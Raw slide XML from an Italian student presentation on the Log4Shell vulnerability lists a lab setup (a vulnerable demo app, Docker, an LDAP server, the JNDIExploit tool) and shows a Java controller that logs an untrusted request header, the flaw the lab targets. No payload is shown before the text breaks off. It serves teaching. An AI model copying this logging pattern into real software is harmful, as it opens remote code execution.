                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC4F5365-7866-4015-A45E-047C3D84E8A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5313697" y="4065113"/>
            <a:ext cx="3855028" cy="323165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat ExtraBold" panose="00000900000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Aurilio Francesco   - 0522500979</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="CasellaDiTesto 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAF90EE6-F0F9-46C1-A74C-923F89E1DA06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5317068" y="4388278"/>
            <a:ext cx="3855028" cy="323165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat ExtraBold" panose="00000900000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>D’Angelo Carmine - 0522500881</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6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2560501" y="298090"/>
            <a:ext cx="4022998" cy="49806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a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800" dirty="0" err="1"/>
              <a:t>Strumenti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800" dirty="0" err="1"/>
              <a:t>utilizzati</a:t>
            </a:r>
            <a:endParaRPr sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215" name="Google Shape;215;p36"/>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36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="629692" y="1105264"/>
            <a:ext cx="144992" cy="269768"/>
            <a:chOff x="629692" y="1105264"/>
            <a:chExt cx="144992" cy="269768"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="217" name="Google Shape;217;p36"/>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6"/>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36">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220" name="Google Shape;220;p36"/>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it-IT" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:endParaRPr sz="900" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="221" name="Google Shape;221;p36">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22" name="Google Shape;222;p36">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3" name="Sottotitolo 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C537561-DC51-75E2-41D7-05288C0F43EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1087598" y="940704"/>
            <a:ext cx="7310681" cy="2208896"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l"/>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Macchina vulnerabile: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/christophetd/log4shell-vulnerable-app</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Docker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Server LDAP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1"/>
              <a:t>JNDIExploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t> v1.2</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1400" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" b="1" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Immagine 7" descr="Immagine che contiene testo&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87D37F5B-A177-E2D1-DC37-C3F47F9DF6A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6429118" y="2414138"/>
            <a:ext cx="1627284" cy="1627284"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="360560032"/>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6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2239263" y="309844"/>
            <a:ext cx="4665473" cy="49806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 Classe vulnerabile</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215" name="Google Shape;215;p36"/>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36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="629692" y="1105264"/>
            <a:ext cx="144992" cy="269768"/>
            <a:chOff x="629692" y="1105264"/>
            <a:chExt cx="144992" cy="269768"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="217" name="Google Shape;217;p36"/>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6"/>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36">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220" name="Google Shape;220;p36"/>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it-IT" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>11</a:t>
            </a:r>
            <a:endParaRPr sz="900" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="221" name="Google Shape;221;p36">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22" name="Google Shape;222;p36">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34" name="CasellaDiTesto 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF52AA16-AF93-7276-1C5E-9DEA0C096573}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1354443" y="1556087"/>
            <a:ext cx="7019982" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Public class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>MainController</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>private </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>static</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>final</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Logger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>logger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>LogManager.getLogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>HelloWorld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    @GetMapping("/")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    public </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> index(@RequestHeader("X-Api-Version") </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>apiVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>        logger.info("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Received</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> for API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> " + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>apiVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> "Hello, world!";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4249238063"/>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6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3059754" y="239643"/>
            <a:ext cx="3024492"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JNDI Exploit</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215" name="Google Shape;215;p36"/>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36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="629692" y="1105264"/>
            <a:ext cx="144992" cy="269768"/>
            <a:chOff x="629692" y="1105264"/>
            <a:chExt cx="144992" cy="269768"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="217" name="Google Shape;217;p36"/>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6"/>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36">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220" name="Google Shape;220;p36"/>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it-IT" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>12</a:t>
            </a:r>
            <a:endParaRPr sz="900" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="221" name="Google Shape;221;p36">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22" name="Google Shape;222;p36">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2" name="CasellaDiTesto 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F403B125-9B72-8096-320C-68F0BD53078A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1320801" y="1131036"/>
            <a:ext cx="7296918" cy="2893100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ramework basato su Java che prende di mira specificamente le vulnerabilità JNDI.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Permette di istanziare un server LDAP e di stabilire una connessione HTTP.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
